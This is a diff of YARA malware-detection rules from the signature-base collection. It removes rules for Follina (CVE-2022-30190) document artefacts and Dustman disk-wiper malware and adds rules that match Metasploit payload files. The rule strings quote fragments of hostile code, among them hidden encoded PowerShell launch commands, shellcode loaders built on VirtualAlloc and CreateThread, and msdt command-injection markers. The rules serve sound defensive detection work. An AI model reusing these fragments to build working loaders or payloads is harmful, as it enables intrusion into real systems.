-               65 00 78 00 65 00 }
-		$fp2 = "FilesFullTrust" wide
-		$fp3 = "Cisco Spark" ascii wide
-		$fp4 = "author: " ascii
+		$s1 = "& \"\\\" & \"svchost.exe\"" fullword ascii
+		$s2 = "CreateObject(\"Wscript.Shell\")" fullword ascii
+		$s3 = "<% @language=\"VBScript\" %>" fullword ascii
 
 	condition:
-		filesize < 10MB and $a and 1 of ( $sa* ) and 1 of ( $sb* ) and not 1 of ( $fp* ) and not uint8( 0 ) == 0x7B
+		all of them
 }
-rule SIGNATURE_BASE_SUSP_Doc_Wordxmlrels_May22 : CVE_2022_30190 FILE
+rule SIGNATURE_BASE_Msfpayloads_Msf_Psh
 {
 	meta:
-		description = "Detects a suspicious pattern in docx document.xml.rels file as seen in CVE-2022-30190 / Follina exploitation"
-		author = "Tobias Michalski, Christian Burkard, Wojciech Cieslak"
-		id = "304c4816-b2f6-5319-9fe9-8f74bdb82ad0"
-		date = "2022-05-30"
-		modified = "2022-06-20"
-		reference = "https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_doc_follina.yar#L38-L60"
+		description = "Metasploit Payloads - file msf-psh.vba"
+		author = "Florian Roth (Nextron Systems)"
+		id = "5b760f03-b0f8-5871-bd34-e7e44443530c"
+		date = "2017-02-09"
+		modified = "2023-12-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_metasploit_payloads.yar#L42-L57"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "62f262d180a5a48f89be19369a8425bec596bc6a02ed23100424930791ae3df0"
-		logic_hash = "c9846f8c2c1724792de14ab4de0064f951a8faaf01cc27d873e600f29d59c842"
-		score = 70
+		logic_hash = "2e6015e8c91ccd8647e78220d10c2d704867369d962b734bb4522a1213be2f2d"
+		score = 75
 		quality = 85
-		tags = "CVE-2022-30190, FILE"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "5cc6c7f1aa75df8979be4a16e36cece40340c6e192ce527771bdd6463253e46f"
 
 	strings:
-		$a1 = "<Relationships" ascii
-		$a2 = "TargetMode=\"External\"" ascii
-		$x1 = ".html!" ascii
-		$x2 = ".htm!" ascii
-		$x3 = "%2E%68%74%6D%6C%21" ascii
-		$x4 = "%2E%68%74%6D%21" ascii
+		$s1 = "powershell.exe -nop -w hidden -e" ascii
+		$s2 = "Call Shell(" ascii
+		$s3 = "Sub Workbook_Open()" fullword ascii
 
 	condition:
-		filesize < 50KB and all of ( $a* ) and 1 of ( $x* )
+		all of them
 }
-rule SIGNATURE_BASE_SUSP_Doc_RTF_Externalresource_May22 : CVE_2022_30190 FILE
+rule SIGNATURE_BASE_Msfpayloads_Msf_Exe
 {
 	meta:
-		description = "Detects a suspicious pattern in RTF files which downloads external resources as seen in CVE-2022-30190 / Follina exploitation"
-		author = "Tobias Michalski, Christian Burkard"
-		id = "71bb97e0-ec12-504c-a1f6-25039ac91c86"
-		date = "2022-05-30"
-		modified = "2022-05-31"
-		reference = "https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_doc_follina.yar#L62-L78"
+		description = "Metasploit Payloads - file msf-exe.vba"
+		author = "Florian Roth (Nextron Systems)"
+		id = "fd07240e-0ee0-5318-a436-d97054e92414"
+		date = "2017-02-09"
+		modified = "2023-12-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_metasploit_payloads.yar#L59-L77"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "c841e0c1ff78bf8dade5f573a7452b16a7f447cfc19417704b727684a8f3d3ff"
-		score = 70
+		logic_hash = "3baa242e90dd845e022785101ebc2d5c0d84007d20aef6a2bb6a9a8c6280d4eb"
+		score = 75
 		quality = 85
-		tags = "CVE-2022-30190, FILE"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "321537007ea5052a43ffa46a6976075cee6a4902af0c98b9fd711b9f572c20fd"
 
 	strings:
-		$s1 = " LINK htmlfile \"http" ascii
-		$s2 = ".html!\" " ascii
+		$s1 = "'* PAYLOAD DATA" fullword ascii
+		$s2 = " = Shell(" ascii
+		$s3 = "= Environ(\"USERPROFILE\")" fullword ascii
+		$s4 = "'**************************************************************" fullword ascii
+		$s5 = "ChDir (" ascii
+		$s6 = "'* MACRO CODE" fullword ascii
 
 	condition:
-		uint32be( 0 ) == 0x7B5C7274 and filesize < 300KB and all of them
+		4 of them
 }
-rule SIGNATURE_BASE_EXPL_Follina_CVE_2022_30190_Msdt_Msprotocoluri_May22 : CVE_2022_30190 FILE
+rule SIGNATURE_BASE_Msfpayloads_Msf_3
 {
 	meta:
-		description = "Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation"
-		author = "Tobias Michalski, Christian Burkard"
-		id = "62e67c25-a420-5dac-9d1c-b0648ea6b574"
-		date = "2022-05-30"
-		modified = "2022-07-18"
-		reference = "https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_doc_follina.yar#L80-L98"
+		description = "Metasploit Payloads - file msf.psh"
+		author = "Florian Roth (Nextron Systems)"
+		id = "ad09167f-a12a-5f07-940b-df679fa8e6c0"
+		date = "2017-02-09"
+		modified = "2023-12-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_metasploit_payloads.yar#L79-L102"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "d56820737951f97606749c74025589e6a8ecbe70cfff069492368b2ba8528a7d"
-		score = 80
-		quality = 60
-		tags = "CVE-2022-30190, FILE"
-		hash1 = "4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784"
-		hash2 = "778cbb0ee4afffca6a0b788a97bc2f4855ceb69ddc5eaa230acfa2834e1aeb07"
+		logic_hash = "d1aeb97c19365f996dc1bc0fd6e01342878967be25d3e042158eba986af28b4a"
+		score = 75
+		quality = 83
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "335cfb85e11e7fb20cddc87e743b9e777dc4ab4e18a39c2a2da1aa61efdbd054"
 
 	strings:
-		$re1 = /location\.href\s{0,20}=\s{0,20}"ms-msdt:/
-		$a1 = "%6D%73%2D%6D%73%64%74%3A%2F" ascii
+		$s1 = "[DllImport(\"kernel32.dll\")] public static extern int WaitForSingleObject(" ascii
+		$s2 = "public enum MemoryProtection { ExecuteReadWrite = 0x40 }" fullword ascii
+		$s3 = ".func]::VirtualAlloc(0,"
+		$s4 = ".func+AllocationType]::Reserve -bOr [" ascii
+		$s5 = "New-Object System.CodeDom.Compiler.CompilerParameters" fullword ascii
+		$s6 = "ReferencedAssemblies.AddRange(@(\"System.dll\", [PsObject].Assembly.Location))" fullword ascii
+		$s7 = "public enum AllocationType { Commit = 0x1000, Reserve = 0x2000 }" fullword ascii
+		$s8 = ".func]::CreateThread(0,0,$" fullword ascii
+		$s9 = "public enum Time : uint { Infinite = 0xFFFFFFFF }" fullword ascii
+		$s10 = "= [System.Convert]::FromBase64String(\"/" ascii
+		$s11 = "{ $global:result = 3; return }" fullword ascii
 
 	condition:
-		filesize > 3KB and filesize < 100KB and 1 of them
+		4 of them
 }
-rule SIGNATURE_BASE_SUSP_Doc_RTF_Ole2Link_Jun22 : FILE
+rule SIGNATURE_BASE_Msfpayloads_Msf_4
 {
 	meta:
-		description = "Detects a suspicious pattern in RTF files which downloads external resources"
-		author = "Christian Burkard"
-		id = "e9c83d58-6214-51d5-882a-4bd2ed6acc9a"
-		date = "2022-06-01"
-		modified = "2025-03-21"
+		description = "Metasploit Payloads - file msf.aspx"
+		author = "Florian Roth (Nextron Systems)"
+		id = "00d7681b-6041-5fe1-adbb-8b7c40df0193"
+		date = "2017-02-09"
+		modified = "2023-12-05"
 		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_doc_follina.yar#L100-L131"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_metasploit_payloads.yar#L104-L121"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "4abc20e5130b59639e20bd6b8ad759af18eb284f46e99a5cc6b4f16f09456a68"
-		logic_hash = "36cb711399197c694ac4fa4fd49cd5d587a830e152a138c81851b8e16301803d"
+		logic_hash = "8e84ef13aa72c7c35520b3534b908c7d00240915ab02f8216a2cef6440c322a2"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "26b3e572ba1574164b76c6d5213ab02e4170168ae2bcd2f477f246d37dbe84ef"
 
 	strings:
-		$sa = "\\objdata" ascii nocase
-		$sb1 = "4f4c45324c696e6b" ascii
-		$sb2 = "4F4C45324C696E6B" ascii
-		$sc1 = "d0cf11e0a1b11ae1" ascii
-		$sc2 = "D0CF11E0A1B11AE1" ascii
-		$x1 = "68007400740070003a002f002f00" ascii
-		$x2 = "68007400740070003A002F002F00" ascii
-		$x3 = "680074007400700073003a002f002f00" ascii
-		$x4 = "680074007400700073003A002F002F00" ascii
-		$x5 = "6600740070003a002f002f00" ascii
-		$x6 = "6600740070003A002F002F00" ascii
+		$s1 = "= VirtualAlloc(IntPtr.Zero,(UIntPtr)" ascii
+		$s2 = ".Length,MEM_COMMIT, PAGE_EXECUTE_READWRITE);" ascii
+		$s3 = "[System.Runtime.InteropServices.DllImport(\"kernel32\")]" fullword ascii
+		$s4 = "private static IntPtr PAGE_EXECUTE_READWRITE=(IntPtr)0x40;" fullword ascii
+		$s5 = "private static extern IntPtr VirtualAlloc(IntPtr lpStartAddr,UIntPtr size,Int32 flAllocationType,IntPtr flProtect);" fullword ascii
 
 	condition:
-		( uint32be( 0 ) == 0x7B5C7274 or uint32be( 0 ) == 0x7B5C2A5C ) and $sa and 1 of ( $sb* ) and 1 of ( $sc* ) and 1 of ( $x* )
+		4 of them
 }
-rule SIGNATURE_BASE_SUSP_Doc_RTF_Ole2Link_EMAIL_Jun22 : FILE
+rule SIGNATURE_BASE_Msfpayloads_Msf_Exe_2
 {
 	meta:
-		description = "Detects a suspicious pattern in RTF files which downloads external resources inside e-mail attachments"
-		author = "Christian Burkard"
-		id = "48cde505-3ce4-52ef-b338-0c08ac4f63de"
-		date = "2022-06-01"
-		modified = "2025-03-21"
+		description = "Metasploit Payloads - file msf-exe.aspx"
+		author = "Florian Roth (Nextron Systems)"
+		id = "a55a33e1-8f04-5417-af0c-b7e2da36fb46"
+		date = "2017-02-09"
+		modified = "2023-12-05"
 		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_doc_follina.yar#L133-L192"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_metasploit_payloads.yar#L123-L139"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "4abc20e5130b59639e20bd6b8ad759af18eb284f46e99a5cc6b4f16f09456a68"
-		logic_hash = "fcbb3e32762f8c67b5b226e8095b767d630f8c118521a82fc22f9a3cc272b794"
+		logic_hash = "bd82f496ade1a62e0aee8c8c90cee84377cb90adf11c87652082e74c8c85e568"
 		score = 75
 		quality = 83
-		tags = "FILE"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "3a2f7a654c1100e64d8d3b4cd39165fba3b101bbcce6dd0f70dae863da338401"
 
 	strings:
-		$sa1 = "XG9iamRhdG" ascii
-		$sa2 = "xvYmpkYXRh" ascii
-		$sa3 = "cb2JqZGF0Y" ascii
-		$sb1 = "NGY0YzQ1MzI0YzY5NmU2Y" ascii
-		$sb2 = "RmNGM0NTMyNGM2OTZlNm" ascii
-		$sb3 = "0ZjRjNDUzMjRjNjk2ZTZi" ascii
-		$sb4 = "NEY0QzQ1MzI0QzY5NkU2Q" ascii
-		$sb5 = "RGNEM0NTMyNEM2OTZFNk" ascii
-		$sb6 = "0RjRDNDUzMjRDNjk2RTZC" ascii
-		$sc1 = "ZDBjZjExZTBhMWIxMWFlM" ascii
-		$sc2 = "QwY2YxMWUwYTFiMTFhZT" ascii
-		$sc3 = "kMGNmMTFlMGExYjExYWUx" ascii
-		$sc4 = "RDBDRjExRTBBMUIxMUFFM" ascii
-		$sc5 = "QwQ0YxMUUwQTFCMTFBRT" ascii
-		$sc6 = "EMENGMTFFMEExQjExQUUx" ascii
-		$x1 = "NjgwMDc0MDA3NDAwNzAwMDNhMDAyZjAwMmYwM" ascii
-		$x2 = "Y4MDA3NDAwNzQwMDcwMDAzYTAwMmYwMDJmMD" ascii
-		$x3 = "2ODAwNzQwMDc0MDA3MDAwM2EwMDJmMDAyZjAw" ascii
-		$x4 = "NjgwMDc0MDA3NDAwNzAwMDNBMDAyRjAwMkYwM" ascii
-		$x5 = "Y4MDA3NDAwNzQwMDcwMDAzQTAwMkYwMDJGMD" ascii
-		$x6 = "2ODAwNzQwMDc0MDA3MDAwM0EwMDJGMDAyRjAw" ascii
-		$x7 = "NjgwMDc0MDA3NDAwNzAwMDczMDAzYTAwMmYwMDJmMD" ascii
-		$x8 = "Y4MDA3NDAwNzQwMDcwMDA3MzAwM2EwMDJmMDAyZjAw" ascii
-		$x9 = "2ODAwNzQwMDc0MDA3MDAwNzMwMDNhMDAyZjAwMmYwM" ascii
-		$x10 = "NjgwMDc0MDA3NDAwNzAwMDczMDAzQTAwMkYwMDJGMD" ascii
-		$x11 = "Y4MDA3NDAwNzQwMDcwMDA3MzAwM0EwMDJGMDAyRjAw" ascii
-		$x12 = "2ODAwNzQwMDc0MDA3MDAwNzMwMDNBMDAyRjAwMkYwM" ascii
-		$x13 = "NjYwMDc0MDA3MDAwM2EwMDJmMDAyZjAw" ascii
-		$x14 = "Y2MDA3NDAwNzAwMDNhMDAyZjAwMmYwM" ascii
-		$x15 = "2NjAwNzQwMDcwMDAzYTAwMmYwMDJmMD" ascii
-		$x16 = "NjYwMDc0MDA3MDAwM0EwMDJGMDAyRjAw" ascii
-		$x17 = "Y2MDA3NDAwNzAwMDNBMDAyRjAwMkYwM" ascii
-		$x18 = "2NjAwNzQwMDcwMDAzQTAwMkYwMDJGMD" ascii
+		$x1 = "= new System.Diagnostics.Process();" fullword ascii
+		$x2 = ".StartInfo.UseShellExecute = true;" fullword ascii
+		$x3 = ", \"svchost.exe\");" ascii
+		$s4 = " = Path.GetTempPath();" ascii
 
 	condition:
-		filesize < 10MB and 1 of ( $sa* ) and 1 of ( $sb* ) and 1 of ( $sc* ) and 1 of ( $x* )
+		all of them
 }
-rule SIGNATURE_BASE_SUSP_DOC_RTF_Externalresource_EMAIL_Jun22 : CVE_2022_30190 FILE
+rule SIGNATURE_BASE_Msfpayloads_Msf_5
 {
 	meta:
-		description = "Detects a suspicious pattern in RTF files which downloads external resources as seen in CVE-2022-30190 / Follina exploitation inside e-mail attachment"
-		author = "Christian Burkard"
-		id = "3ddc838c-8520-5572-9652-8cb823f83e27"
-		date = "2022-06-01"
-		modified = "2025-03-21"
-		reference = "https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_doc_follina.yar#L194-L220"
+		description = "Metasploit Payloads - file msf.msi"
+		author = "Florian Roth (Nextron Systems)"
+		id = "030d1982-c9a8-539d-a995-7901ae425857"
+		date = "2017-02-09"
+		modified = "2023-12-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_metasploit_payloads.yar#L141-L156"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "73e76bd80f77640c0d8d47ebb7903eb9cc23336fbe653e7d008cae6a0de7c45b"
-		score = 70
+		logic_hash = "cb602670329391b091f87818a0f5defaa8f688f7921978510739b96ca63a2f12"
+		score = 75
 		quality = 85
-		tags = "CVE-2022-30190, FILE"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "7a6c66dfc998bf5838993e40026e1f400acd018bde8d4c01ef2e2e8fba507065"
 
 	strings:
-		$sa1 = "PFJlbGF0aW9uc2hpcH" ascii
-		$sa2 = "xSZWxhdGlvbnNoaXBz" ascii
-		$sa3 = "8UmVsYXRpb25zaGlwc" ascii
-		$sb1 = "VGFyZ2V0TW9kZT0iRXh0ZXJuYWwi" ascii
-		$sb2 = "RhcmdldE1vZGU9IkV4dGVybmFsI" ascii
-		$sb3 = "UYXJnZXRNb2RlPSJFeHRlcm5hbC" ascii
-		$sc1 = "Lmh0bWwhI" ascii
-		$sc2 = "5odG1sIS" ascii
-		$sc3 = "uaHRtbCEi" ascii
+		$s1 = "required to install Foobar 1.0." fullword ascii
+		$s2 = "Copyright 2009 The Apache Software Foundation." fullword wide
+		$s3 = "{50F36D89-59A8-4A40-9689-8792029113AC}" fullword ascii
 
 	condition:
-		filesize < 400KB and 1 of ( $sa* ) and 1 of ( $sb* ) and 1 of ( $sc* )
+		all of them
 }
-rule SIGNATURE_BASE_SUSP_Msdt_Artefact_Jun22_2 : CVE_2022_30190 FILE
+rule SIGNATURE_BASE_Msfpayloads_Msf_6
 {
 	meta:
-		description = "Detects suspicious pattern in msdt diagnostics log (e.g. CVE-2022-30190 / Follina exploitation)"
-		author = "Christian Burkard"
-		id = "aa2a4bd7-2094-5652-a088-f58d0c7d3f62"
-		date = "2022-06-01"
-		modified = "2022-07-29"
-		reference = "https://twitter.com/nas_bench/status/1531718490494844928"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_doc_follina.yar#L222-L241"
+		description = "Metasploit Payloads - file msf.vbs"
+		author = "Florian Roth (Nextron Systems)"
+		id = "5485102b-e709-5111-814a-e6878b4bd889"
+		date = "2017-02-09"
+		modified = "2023-12-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_metasploit_payloads.yar#L158-L177"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "e18f6405f0411128335336e65dda4ed2b6be6e9ad47b94646ececf0479fbe967"
+		logic_hash = "b9498828a55477049922e50329d0c38ee34b8484562113a2686669ccbb8b3318"
 		score = 75
 		quality = 85
-		tags = "CVE-2022-30190, FILE"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "8d6f55c6715c4a2023087c3d0d7abfa21e31a629393e4dc179d31bb25b166b3f"
 
 	strings:
-		$a1 = "<ScriptError><Data id=\"ScriptName\" name=\"Script\">TS_ProgramCompatibilityWizard.ps1" ascii
-		$x1 = "/../../" ascii
-		$x2 = "$(Invoke-Expression" ascii
-		$x3 = "$(IEX(" ascii nocase
+		$s1 = "= CreateObject(\"Wscript.Shell\")" fullword ascii
+		$s2 = "= CreateObject(\"Scripting.FileSystemObject\")" fullword ascii
+		$s3 = ".GetSpecialFolder(2)" ascii
+		$s4 = ".Write Chr(CLng(\"" ascii
+		$s5 = "= \"4d5a90000300000004000000ffff00" ascii
+		$s6 = "For i = 1 to Len(" ascii
+		$s7 = ") Step 2" ascii
 
 	condition:
-		uint32( 0 ) == 0x6D783F3C and $a1 and 1 of ( $x* )
+		5 of them
 }
-rule SIGNATURE_BASE_SUSP_LNK_Follina_Jun22 : CVE_2022_30190 FILE
+rule SIGNATURE_BASE_Msfpayloads_Msf_7
 {
 	meta:
-		description = "Detects LNK files with suspicious Follina/CVE-2022-30190 strings"
-		author = "Paul Hager"
-		id = "d331d584-2ab3-5275-b435-6129c7291417"
-		date = "2022-06-02"
-		modified = "2025-03-21"
-		reference = "https://twitter.com/gossithedog/status/1531650897905950727"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_doc_follina.yar#L243-L261"
+		description = "Metasploit Payloads - file msf.vba"
+		author = "Florian Roth (Nextron Systems)"
+		id = "8d1b742e-510a-5807-ad3f-f10cc325d292"
+		date = "2017-02-09"
+		modified = "2023-12-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_metasploit_payloads.yar#L179-L194"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "0b63bb266b968987b2b5a83c9429e96acbd57e12178e4f5fd5894b23d1aaa237"
+		logic_hash = "167d295de5ffc9c88cf72f086fef4514f08cc3b9dd2d93b3ec36acffd6430370"
 		score = 75
 		quality = 85
-		tags = "CVE-2022-30190, FILE"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "425beff61a01e2f60773be3fcb74bdfc7c66099fe40b9209745029b3c19b5f2f"
 
 	strings:
-		$sa1 = "msdt.exe" ascii wide
-		$sa2 = "msdt " ascii wide
-		$sa3 = "ms-msdt:" ascii wide
-		$sb = "IT_BrowseForFile=" ascii wide
+		$s1 = "Private Declare PtrSafe Function CreateThread Lib \"kernel32\" (ByVal" ascii
+		$s2 = "= VirtualAlloc(0, UBound(Tsw), &H1000, &H40)" fullword ascii
+		$s3 = "= RtlMoveMemory(" ascii
 
 	condition:
-		filesize < 5KB and uint16( 0 ) == 0x004c and uint32( 4 ) == 0x00021401 and 1 of ( $sa* ) and $sb
+		all of them
 }
-rule SIGNATURE_BASE_SUSP_LNK_Suspicious_Folders_Jan25 : FILE
+rule SIGNATURE_BASE_Msfpayloads_Msf_8
 {
 	meta:
-		description = "Detects link files (.LNK) with suspicious folders mentioned in the target path"
-		author = "Florian Roth"
-		id = "5f1bcd18-abec-5831-b24f-519c92a2454e"
-		date = "2025-01-24"
-		modified = "2025-03-20"
+		description = "Metasploit Payloads - file msf.ps1"
+		author = "Florian Roth (Nextron Systems)"
+		id = "54466663-12ef-5fa4-a13c-e80ddbc0f4f8"
+		date = "2017-02-09"
+		modified = "2023-12-05"
 		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mixed_open_source_export.yar#L2-L16"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_metasploit_payloads.yar#L196-L215"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "776adb706e165389d0abdf8d6f719f6db1ec6d2f3d9d96e1c4a5f2b55e482c31"
-		score = 65
+		logic_hash = "d2b26276843cdfef2d1458ee6c3e2ecea962d1cd42bc21b86ebd03599bebcbc6"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "519717e01f0cb3f460ef88cd70c3de8c7f00fb7c564260bd2908e97d11fde87f"
 
 	strings:
-		$x1 = "RECYCLER.BIN\\" wide
-		$x2 = "Perflogs\\" wide
+		$s1 = "[DllImport(\"kernel32.dll\")]" fullword ascii
+		$s2 = "[DllImport(\"msvcrt.dll\")]" fullword ascii
+		$s3 = "-Name \"Win32\" -namespace Win32Functions -passthru" fullword ascii
+		$s4 = "::VirtualAlloc(0,[Math]::Max($" ascii
+		$s5 = ".Length,0x1000),0x3000,0x40)" ascii
+		$s6 = "public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);" fullword ascii
+		$s7 = "::memset([IntPtr]($" ascii
 
 	condition:
-		uint16( 0 ) == 0x004c and 1 of them
+		6 of them
 }
-rule SIGNATURE_BASE_MAL_ME_Rawdisk_Agent_Jan20_1 : FILE
+rule SIGNATURE_BASE_Msfpayloads_Msf_Cmd
 {
 	meta:
-		description = "Detects suspicious malware using ElRawDisk"
+		description = "Metasploit Payloads - file msf-cmd.ps1"
 		author = "Florian Roth (Nextron Systems)"
-		id = "0efaae51-1407-5039-9e5a-9c2f13d6a971"
-		date = "2020-01-02"
-		modified = "2022-12-21"
-		reference = "Saudi National Cybersecurity Authority - Destructive Attack DUSTMAN"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_dustman.yar#L2-L24"
+		id = "71d42c34-a0b0-5173-8f2f-f48a7af0e4ff"
+		date = "2017-02-09"
+		modified = "2023-12-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_metasploit_payloads.yar#L217-L230"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "90345b8358d72b6616c6277222fb1091cb3a88b844391ac3766e7d1ee1192fbe"
-		score = 65
+		logic_hash = "ea44b3d00733eb7d4f924ccaece5265fcd90a462acb954a134b5355ecb0621e5"
+		score = 75
 		quality = 85
-		tags = "FILE"
-		hash1 = "44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "9f41932afc9b6b4938ee7a2559067f4df34a5c8eae73558a3959dd677cb5867f"
 
 	strings:
-		$x1 = "\\drv\\agent.plain.pdb" ascii
-		$x2 = " ************** Down With Saudi Kingdom, Down With Bin Salman ************** " fullword ascii
-		$s1 = ".?AVERDError@@" fullword ascii
-		$s2 = "b4b615c28ccd059cf8ed1abf1c71fe03c0354522990af63adf3c911e2287a4b906d47d" fullword wide
-		$s3 = "\\\\?\\ElRawDisk" fullword wide
-		$s4 = "\\??\\c:" wide
-		$op1 = { e9 3d ff ff ff 33 c0 48 89 05 0d ff 00 00 48 8b }
-		$op2 = { 0f b6 0c 01 88 48 34 48 8b 8d a8 }
+		$x1 = "%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -e" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize <= 2000KB and ( 1 of ( $x* ) or 4 of them )
+		all of them
 }
-rule SIGNATURE_BASE_MAL_ME_Rawdisk_Agent_Jan20_2 : FILE
+rule SIGNATURE_BASE_Msfpayloads_Msf_9 : FILE
 {
 	meta:
-		description = "Detects suspicious malware using ElRawDisk"
+		description = "Metasploit Payloads - file msf.war - contents"
 		author = "Florian Roth (Nextron Systems)"
-		id = "9817fb22-7bed-5869-aa92-66c458b81c7f"
-		date = "2020-01-02"
-		modified = "2022-12-21"
-		reference = "https://twitter.com/jfslowik/status/1212501454549741568?s=09"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_dustman.yar#L26-L50"
+		id = "488a2e97-ebc2-5ccf-ab5d-dfed4b534b52"
+		date = "2017-02-09"
+		modified = "2023-12-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_metasploit_payloads.yar#L232-L252"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "73e4a88b749e3b2654e9021290932d2e556c29cfa772785b23bebad9f3a3f90a"
-		score = 65
-		quality = 85
+		logic_hash = "b5761b51b79f83c48deafaf3786cb90ef493ab0448cd67b86655cecb0160a627"
+		score = 75
+		quality = 83
 		tags = "FILE"
-		hash1 = "44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2"
+		hash1 = "e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81"
 
 	strings:
-		$x1 = "\\Release\\Dustman.pdb" ascii
-		$x2 = "/c agent.exe A" fullword ascii
-		$s1 = "C:\\windows\\system32\\cmd.exe" fullword ascii
-		$s2 = "The Magic Word!" fullword ascii
-		$s3 = "Software\\Oracle\\VirtualBox" fullword wide
-		$s4 = "\\assistant.sys" wide
-		$s5 = "Down With Bin Salman" fullword wide
-		$sc1 = { 00 5C 00 5C 00 2E 00 5C 00 25 00 73 }
-		$op1 = { 49 81 c6 ff ff ff 7f 4c 89 b4 24 98 }
